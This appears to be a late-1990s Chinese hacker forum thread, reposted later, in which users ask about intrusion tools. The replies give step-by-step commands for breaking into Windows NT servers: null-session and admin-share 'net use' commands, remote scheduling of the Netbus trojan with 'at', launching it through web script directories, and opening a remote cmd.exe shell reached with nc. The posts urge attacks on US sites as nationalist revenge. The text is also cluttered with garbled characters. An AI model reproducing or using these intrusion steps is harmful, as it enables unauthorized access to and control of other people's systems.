《版主頁(yè)黑客工具和文章的幾個(gè)問題》中提到:: K' b& M8 V3 m9 ^6 W
請(qǐng)教���,從版主頁(yè)上載得PINGER�,GRINDER����,LETMEIN等,卻不能用��,PINGER安裝后�����,明明安裝前文件有1M多�����,但安裝完后生成的文件夾中只有PINGER����。EXE,40多K���,運(yùn)行PINGER�����,設(shè)置好IP�����,點(diǎn)PING���,彈出一個(gè)窗口(C++。��。�����。),說(shuō)出錯(cuò)�����,然后關(guān)閉了����,何故,是不是安裝有誤����? 2。運(yùn)行LETMEIN�,彈出以下錯(cuò)誤:連接文件LETMEIN。EXE到不存在的NETAPI32�����。DLL�;NETGROUPGETUSERS。 是否說(shuō)明需要NETAPI32����。DLL文件����,哪里有該DLL�����。 3����。USAKILLER 的教學(xué)文章中提到需在WINNT4�����。0下運(yùn)行以下步驟等����,是否要求我的操作系統(tǒng)也是WINNT4。0 �����,應(yīng)該不是吧��? 4���。NC FOR NT 是否要求我的操作系統(tǒng)為NT�,還是服務(wù)器的操作系統(tǒng)為NT? 太多的問題需高手回答���,我花那么多的時(shí)間和金錢下載這幾M文件卻不能用�����,實(shí)在窩囊哦���, 強(qiáng)烈建議USAKILLER 等高手級(jí)的黑客寫更多的教學(xué)文章,以提高我國(guó)黑客水平��。; r6 o* O m0 I0 j4 G5 m4 J) g
> 我的機(jī)子MMX166��,WIN98�����,2����。5G,32M內(nèi)存����。
: H; P% @2 n3 `) D0 l; V& h
; }# H' }1 u; ~5 J. @; |* @, i黑客并不神秘���,你只要了解操作系統(tǒng)�,學(xué)習(xí)一些操作系統(tǒng)的弱點(diǎn),輔助相關(guān)的工具�����,就可以成功����。3 q) f; Q/ G& Z- \
你的問題是,pinger, grinder, letmein等工具必須要在NT上運(yùn)行��,我們強(qiáng)烈建議��,你一定要安裝NT���,對(duì)于你的機(jī)器配制�����,和我們現(xiàn)在差不多���,只是比你多了32M內(nèi)存���,2G硬盤。
8 c, w# t: W; @) W* E/ N" @其實(shí)����,攻擊敵站,利用其操作系統(tǒng)本身的工具就可以了�,比如,我們?cè)贜T上攻擊某服務(wù)器��,該服務(wù)器為NT4.0���,我們將做如下簡(jiǎn)單事情就有可能成功���,假設(shè)目標(biāo)NT的IP地址為111.111.111.111,做法如下:
% k/ b4 p/ H+ w% x6 k E( {* Lnet use \\111.111.111.111\ipc$ "" /user:""
6 R0 d3 o3 v* l9 @- Snet.exe是NT的工具文件����,該命令將和目標(biāo)服務(wù)器建立Null Session,如果成功��,你可以查看該服務(wù)器上的共享目錄:
- S5 q0 t/ N! mnet view \\111.111.111.1114 _2 Z: `) J, p1 i* u/ }8 s2 [
當(dāng)然�,如果你有該NT管理員密碼,就更好辦了�����,假設(shè)其管理員Admin密碼為fuck:! [9 C: T" Q# ~2 [
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
9 M7 [, q4 |$ u- U; v4 w+ Q+ o' C命令成功后,幾乎所有目標(biāo)NT上的配制�����,資源��,你都可以在你本地NT上連接遠(yuǎn)程計(jì)算機(jī)來(lái)查看或修改:0 @7 k' r7 G3 W3 ?
1�、查看或修改遠(yuǎn)程機(jī)器上的硬盤���,假如目標(biāo)NT上有C�、D兩個(gè)硬盤:
5 W; l) [/ |6 T, n2 L) [" ^net use x: \\111.111.111.111\c$3 q7 S3 N" y) t, i
net use y: \\111.111.111.111\d$
3 K5 Y3 c* H; X3 B這樣�,目標(biāo)NT上的C、D盤分別被影射為你本地的X����、Y盤,你想怎么做都可以...
, b& i( x7 Q1 s. m$ ]+ S2�、管理目標(biāo)NT的用戶:
3 L. m3 k* N1 \, J6 n: B從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”! T S Q% i7 N, P5 |
鍵入\\111.111.111.111后,目標(biāo)NT上的所有用戶你想怎么做都可以���,和管理你本地的一樣) j. L+ \ m) F# W* }6 a
3�����、管理目標(biāo)NT的服務(wù)
6 D. h! E6 G8 d% ?. p選擇“管理工具(公用)”->“服務(wù)器管理”->“計(jì)算機(jī)”->“選擇域”' o! @# X* K. }
這樣你可以管理目標(biāo)NT上的服務(wù)���,共享目錄
3 e4 W; b9 @2 J# J: v; o" j" }4��、IIS管理
q0 d, e9 b- [# H$ a5 y選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111. F/ e, ?1 V. m5 v7 T* K& N! E
目標(biāo)NT的FTP�、WWW服務(wù)你就可以重新配置
5 |$ ~& }2 \$ B( C5�、事件管理6 s5 q+ ~/ C% ~ { Z
“事件查看器”->連接到服務(wù)器->111.111.111.111
- T6 e$ @( {5 I N; N" Y7 W! v$ c& y2 V; a k$ l2 D, F
還有更多的東西,都可以用NT本身的功能來(lái)完成����,這些都是95, 98所不能實(shí)現(xiàn)的。
+ o. t8 [; | J7 f7 [% n2 p% q# U) I/ j4 J) {
當(dāng)然����,98,95也能做一些事情,但很麻煩�,比如:5 y& }; }1 Y7 F4 _, r$ l
net use \\111.111.111.111\ipc$9 c( c- @. k: K9 U4 y; ]& I( y# R: q. a
net use z: \\111.111.111.111\d$# Q) n1 `8 S" \8 a1 G
但其后不能帶參數(shù),即改用其他用戶或密碼����,系統(tǒng)將用當(dāng)前用戶和密碼去登錄,如果你知道目標(biāo)NT的用戶或密碼���,重新啟動(dòng)95, 98�����,改用該用戶和密碼登錄����,方可實(shí)現(xiàn),你可以連接目標(biāo)NT上的共享資源�����,但不能進(jìn)行管理�,如用戶�����、事件等
( n" \3 H6 E" F7 c& h' q5 P9 Z! y7 p7 z' I# M7 E2 a* q2 r, l
我們強(qiáng)烈建議各位有心要為死難者報(bào)仇��,真正的想黑霉國(guó)的站點(diǎn)���,花點(diǎn)時(shí)間���,裝個(gè)NT吧��,NT Workstation也可以�����!
* P" o$ Z+ ~; I( a這樣�,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用�����!+ ]( k' r5 H$ @# V
$ H' Z. ~4 V ]7 b$ I0 W
4 E. O" S- T3 c5 M/ c--------------------------------------------------------------------------------7 W$ }3 h$ Z5 _( |' j
. W' \/ i5 j$ k3 c, M
>quack于1999-06-12�����,23:37:44+ r, F1 E. f4 x' L# c
在大作《幾個(gè)有關(guān)黑的問題》中提到:
2 }7 j/ r5 O# R1 x首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時(shí)候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時(shí)亦無(wú)此參數(shù)項(xiàng),不知為是何原因?另,用PINGER查詢到的IP地址若無(wú)機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無(wú)法登陸?再有,假定我上傳了CIH,對(duì)了,CIH對(duì)NT暫時(shí)無(wú)效,假定上傳其它"有益"美國(guó)NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國(guó)機(jī)子,但運(yùn)行程序時(shí)卻是在我的機(jī)上干活,差點(diǎn)把自己斃了!再有,我在微軟的CHAT中常遇到美國(guó)鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說(shuō)一句,我還真干掉了幾個(gè)美國(guó)人,哈!�����。' a8 |+ w6 U9 g
: y. f9 X1 J3 F/ u3 k1 Rkillusa于1999-06-13�,03:25:15$ L0 P- N& R- k2 F4 |" a0 \
在大作《Re: 幾個(gè)有關(guān)黑的問題》中提到:
9 j8 v# G1 J, U, B0 w8 A
: n- M# H3 N6 ` H3 yletmein.exe 暫時(shí)沒有mypwd參數(shù),十分抱歉9 B* E8 X. k& c$ ^) I, U
pinger程序���,只是利用ping來(lái)尋找主機(jī)�����,每臺(tái)NT服務(wù)器有一個(gè)主IP地址�,但也可以設(shè)置多個(gè)輔助IP地址,比如有些服務(wù)器供應(yīng)商���,一臺(tái)NT服務(wù)器上可以設(shè)置一千多個(gè)IP�,每個(gè)IP對(duì)應(yīng)一個(gè)Hostname,而真正能找到主機(jī)名的只有一個(gè)IP地址���,就是該主機(jī)的主IP地址�,所以有時(shí)顯示只有IP����,而無(wú)主機(jī)名��。另外�,有些服務(wù)器是非NT的操作系統(tǒng),有時(shí)將不會(huì)顯示主機(jī)名�。當(dāng)然,有時(shí)在服務(wù)器上進(jìn)行一些設(shè)置��,也會(huì)出現(xiàn)上面的情況�����。
1 J: v: x' R" v$ W: |' l' _- \: r" E% b2 @% S: ?
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個(gè)程序,所以�,netbus.exe是不用上傳的,只需在目的, ?7 s' p. l5 q$ n# }5 J& J' U
服務(wù)器上運(yùn)行ntsrv.exe�,而在目的服務(wù)器運(yùn)行該程序有很多種方法:
% p& S+ L* r% H% `
/ h4 ^, Y# g% p) J1、利用服務(wù)器的 Schedule 服務(wù)來(lái)啟動(dòng)schedule 服務(wù)是指在服務(wù)器上定時(shí)運(yùn)行某程序�����,具體使用方法����,可在自己的NT Dos窗口下鍵入以下:
- p' Z" H% {4 M
7 f; q4 m$ i* L) W2 m7 EC:\>net start schedule7 z1 s. \& L, C" m* N) j. h. A
Schedule 正在啟動(dòng)服務(wù).....1 A# c" t2 L- Q3 n5 `$ H
Schedulw 服務(wù)啟動(dòng)成功。
% F6 W0 b8 Q- ? vC:\>at /?
: `" h) {5 m' SAT 命令排定在特定的日期和時(shí)間運(yùn)行某些命令和程序�����。; z) R8 N+ Z! h' }3 K# N b9 {9 v3 S
運(yùn)行 AT 命令之前必須先啟動(dòng) Schedule 服務(wù)�。
& v, K- j* k0 @3 J2 V
: C5 J M9 B; `2 Y: y# jAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
0 p: X- U$ Q, n5 ZAT [\\computername] time [/INTERACTIVE]9 o v8 I0 ~, f" ]7 A
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
+ J7 U c3 H( P' a I" B- I# m; x6 `2 u+ a# z5 a
\\computername 指定遠(yuǎn)程計(jì)算機(jī)。 如果省略這個(gè)參數(shù)
1 R$ m1 Q7 a) O! v& k命令會(huì)被排定在本機(jī)上運(yùn)行���。
3 I5 o0 z% D: `7 B4 c3 Rid 指定給排定進(jìn)度命令的識(shí)別號(hào)�。
$ e" o+ M/ E2 [
; }( ^$ U+ N3 _2 \" |! Q" v6 e7 l/delete 刪除某個(gè)已排定進(jìn)度的命令���。如果省略標(biāo)識(shí)�,計(jì)算機(jī)上所有已排定進(jìn)度的命令都會(huì)被刪除。
8 r, q% x% v7 L/yes 用于刪除所有作業(yè)�����,且不想在運(yùn)行刪除時(shí)顯示確認(rèn)信息 ����。
" |4 i% R, l5 d$ ctime 指定命令運(yùn)行的時(shí)間。
: L+ Y# a. r- d6 z* n/interactive 允許作業(yè)在運(yùn)行時(shí)��,與用戶通過桌面交互�。
2 I+ r8 `2 f9 e4 n8 Z" x, c, [8 O' U# Y
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令。
7 ~) v! j+ U- p如果省略日期��,則默認(rèn)為在每月的本日運(yùn)行�。
3 `% F8 Y, |. u2 s. W6 [/ P8 Q' Q! y9 l# D& u; S( \0 i
/next:date[,...] 指定在下一個(gè)指定日期 (如,下周三)����,運(yùn)行命令�����。如果省略日期,則默認(rèn)為在每月的本日運(yùn)行��。
- }! j* t" o4 U" S3 e
& S$ I" |. @9 _! ^( i+ U; k9 n"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件����。
: h# L0 j& x( ^5 a7 P: a+ A* }% p( Z$ o. K% H; h+ j
C:\>
3 M5 I) a7 _- y9 u
7 B% q, z& J" i% J; }, f% Q知道了如何使用AT,再來(lái)看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:
3 ]. ~9 R9 {* } U* m1 利用管理員登陸到目的服務(wù)器����,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
0 ?3 p. T8 @) z2 利用ntsrv.exe啟動(dòng)遠(yuǎn)程: netsvc \\x.x.x.x schedule /start" _" H y, m6 t( y4 T# S
3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時(shí)運(yùn)行,當(dāng)然最快運(yùn)行最理想��,所以��,你可以用letmein.exe得到服務(wù)器的時(shí)間��,然后:
3 T$ ~( W$ A9 i( M9 M0 wat \\x.x.x.x 00:00 ntsrv.exe /port:64321' H) b+ v* U# r- B9 i
其中00:00要改為用letmein.exe得回來(lái)的具體時(shí)間+一點(diǎn)容量�,等一會(huì)后,再在本地啟動(dòng)netbus.exe��,鍵入目的服務(wù)器得ip地址或hostname��,連接�����!具體使用可參照 "How to get in nt",比如第一種方法���,你想要在目的服務(wù)器運(yùn)行 LEGION�����,可以利用netbus得上傳功能���,將LEGION上傳至目的服務(wù)器,再用netbus的"Start program"����,鍵入完整路徑的LEGION運(yùn)行程序,就ok了���!第二種方法是利用netbus的“App redirect”功能����,啟動(dòng)遠(yuǎn)程telnet服務(wù)���,如下:在netbus中擊“App redirect”��,鍵入"C:\>winnt\system32\cmd.exe"���,Port為:4321,服務(wù)就啟動(dòng)了���,然后在本地運(yùn)行:nc x.x.x.x 4321����,出現(xiàn)dos啟動(dòng)的畫面就表示連接成功:6 V5 d1 C2 p" w& K: h$ D
Microsoft(R) Windows NT(TM)
8 @) T$ j4 l2 \+ C(C) Copyright 1985-1996 Microsoft Corp.
7 O+ b3 i& F9 v4 e% Q) SC:\>
+ t& B0 { K3 E/ F
* d" P4 a/ O5 }. Q9 z- {" f2���、利用web啟動(dòng)ntsrv.exe或其他程序在目的服務(wù)器
7 W" [- A5 O/ x7 s/ D8 t/ R9 ]! U* v2 n9 u' b
將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄��,如cgi-bin或scripts�,然后在瀏覽器鍵入url如:. D4 y/ i6 I% ~1 z7 b
http://x.x.x.x/scripts/ntsrv.exe /port:64321
" s. k- t/ M, b" S8 h或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:643214 O% ~$ T3 U, `
該程序就啟動(dòng)了
% G. C; h& D/ z& W* o0 N0 X4 }% S! {0 W* y. t9 c) p
我只提這幾中方法����!
0 H4 i7 j: a6 a! k要成功,必須打好基礎(chǔ)工�����,對(duì)操作系統(tǒng)充分了解!
' e5 |" t) y8 T' L! ~- J) l, L- z" b' r% y; ~
|
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡